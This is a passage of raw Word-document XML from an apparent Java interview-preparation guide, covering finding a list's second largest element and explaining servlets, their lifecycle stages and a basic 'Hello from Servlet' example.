    <w:p w14:paraId="446CC2B1" w14:textId="78613CA2" w:rsidR="007D023E" w:rsidRPr="00CE4B95" w:rsidRDefault="007D023E" w:rsidP="007D023E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="400" w:name="_Toc197867614"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Program - How to find the second largest element from the list?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="400"/>
    </w:p>
    <w:p w14:paraId="1B75E442" w14:textId="3FB82710" w:rsidR="007D023E" w:rsidRPr="00CE4B95"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CE4B95" w:rsidRDefault="00D57158" w:rsidP="00D57158">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Streams Approach (Cleanest):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE7E53C"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0751EAF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AFDA1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EDF27"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3AE9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DCAA86"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692DA"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9BC633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1B36899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164985E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A2C82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08E58D3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66181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OrElse</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB635C5"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539882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t enough distinct elements"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B28315B"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FA41F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9880C" w14:textId="58E7B7B1"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6493A19" w14:textId="77777777" w:rsidR="00D57158" w:rsidRPr="00CE4B95"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905" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="624687A1" w14:textId="77777777" w:rsidR="00D57158" w:rsidRPr="00CE4B95" w:rsidRDefault="00D57158" w:rsidP="00D5715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Classic Iterative Approach (Single Pass, O(n)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B37CBB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8E349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394C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1AEEE0DF"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3591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7713D29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E83F89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E3FEF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8075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F743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p>
    <w:p w14:paraId="591B5938"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093AAC5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318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4AF7CB0A"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3517A6"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D90D0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D68C14"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C8CBB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p>
    <w:p w14:paraId="523CB78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5878E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second largest element found."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2323E441"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86875"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10353" w14:textId="44F05D84"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7B891FC2" w14:textId="77777777" w:rsidR="006B2527" w:rsidRPr="00CE4B95" w:rsidRDefault="006B2527" w:rsidP="006B2527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB6CC4B" w14:textId="268E5BBA" w:rsidR="001D2607" w:rsidRPr="00CE4B95" w:rsidRDefault="001D2607" w:rsidP="005F51EC">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2D236A3" w14:textId="7625B5A7" w:rsidR="008F201A" w:rsidRPr="00CE4B95" w:rsidRDefault="008F201A" w:rsidP="008F201A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="401" w:name="_Toc197867615"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Advance Java / J2EE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="401"/>
    </w:p>
    <w:p w14:paraId="118CE4A7" w14:textId="77777777" w:rsidR="0026446D" w:rsidRPr="00CE4B95" w:rsidRDefault="0026446D" w:rsidP="0026446D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="423CF408" w14:textId="0F5E8E77" w:rsidR="00502122" w:rsidRPr="00CE4B95" w:rsidRDefault="00BF2FAE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="402" w:name="_Toc197867616"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is servlet</w:t>
      </w:r>
      <w:r w:rsidR="00502122" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="402"/>
    </w:p>
    <w:p w14:paraId="330C59E8" w14:textId="44E74B85" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="002704B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Java class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP requests and responses</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE1DC30"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906" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C92582"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finition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B0C0AC" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9612B" w:rsidP="002704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Java program that runs on a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java-enabled web server</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like Tomcat) and acts as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>middle layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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907" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBBD519"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Lifecycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEAD356"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xml:space="preserve"> (init())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBA4702"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first loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B42FD7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Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (service())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240324C9"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every time the servlet receives a request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A70957"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legates to doGet(), doPost(), etc., based on HTTP method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1E0BA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 xml:space="preserve"> (destroy())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B2A0BF"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being taken out of service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCDA25D"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908" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DAC80B"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Basic Servlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6D8197"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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@WebServl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0114B7C"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98E6B"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62296574"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25FEA9"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ContentTy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ext/html"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A78C5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ntWri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Writer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BF8B2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t;h1&gt;Hello from Servlet&lt;/h1&gt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2649E46F"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A6C531" w14:textId="6DFE970D"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656A1A"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909" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A455E5"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lasses &amp; Interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007FDBC8"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 – abstract class for HTTP-specific requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441F33DD"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quest – provides request info (parameters, headers, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C158591"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sponse – used to write response back to client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B200A3"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letConfig, ServletContext – provide config and context information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CF5BE3"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910" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5904D1C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s of Servlets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F1AA79"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 form data (login, registration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A25A73E"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dynamic web content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718DD3B5"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ting as a controller in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pattern (e.g., in Spring MVC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FFACF4"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911" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="339B038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the servlet class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3619D007"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the servlet lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174E62AE"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URLs to servlet classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352C6149"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ing HTTP requests/responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029D1094" w14:textId="77777777" w:rsidR="00A9612B" w:rsidRPr="00CE4B95"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12" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C95ADAB" w14:textId="674F2E67" w:rsidR="00FF12B2" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF12B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="403" w:name="_Toc197867617"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain servlet lifecycle?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="403"/>
    </w:p>
    <w:p w14:paraId="2EF27075" w14:textId="0A079B9E" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00193873">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Servlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> goes through </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5 stages</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in its lifecycle, managed by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Servlet Container</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like Tomcat). These stages are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D0F6FF"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13" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA05AD8"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1. Loading and Instantiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC9F1E1"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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Servlet container loads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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n it </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>creates an instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the servlet using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>no-arg constructor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62129EDB"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14" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F652BC5"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2. Initialization (init() method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674D1A3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lastRenderedPageBreak/>
        <w:t xml:space="preserve">After instantiation, the container calls the init(ServletConfig config)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13F31DA0"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initialize resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> like DB connections, file reading, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C449B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You can override this method in your servlet class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2524E46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35C32CB"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155FA0"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ation code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535ECCEF" w14:textId="2E9A9014"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2F08EEC"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15" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A7BC0A"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3. Request Handling (service() method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE5B057"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For </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>each request</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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7DF00BE"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C2C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GET request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DDFD5F" w14:textId="613EC2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506E77"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16" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AA818D"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4. Destruction (destroy() method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6538F282"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54BC61D5"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release resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> like closing DB connections, stopping threads, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6CE4B6"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4F8EF095"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stro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075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eanup code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D144E44" w14:textId="6BEC4B8B"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5DA1854"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17" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE44893"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5. Garbage Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C10532" w14:textId="77777777" w:rsidR="00B94CCE" w:rsidRPr="00CE4B95" w:rsidRDefault="00B94CCE" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1754"/>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fter destroy() is called, the object is eligible for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>garbage collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F1282E"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18" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9F3E76"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w14:paraId="3B9AE168" w14:textId="77777777" w:rsidTr="00B94CCE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="772BEEDC"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Frequency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00193873" w:rsidRPr="00CE4B95" w14:paraId="3C21F215" w14:textId="77777777" w:rsidTr="00B94CCE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FC6256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414F4290" w14:textId="77777777" w:rsidTr="00B94CCE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D50F12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7BE68628" w14:textId="77777777" w:rsidTr="00B94CCE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18B974AB"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For every request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00193873" w:rsidRPr="00CE4B95" w14:paraId="115ABA0E" w14:textId="77777777" w:rsidTr="00B94CCE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55B5AAA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67C9D4F5" w14:textId="77777777" w:rsidTr="00B94CCE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60A0750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GC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3183332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After destroy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44FBA840"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19" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D1867F" w14:textId="4F54E14D" w:rsidR="00496E5A" w:rsidRPr="00CE4B95" w:rsidRDefault="00496E5A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
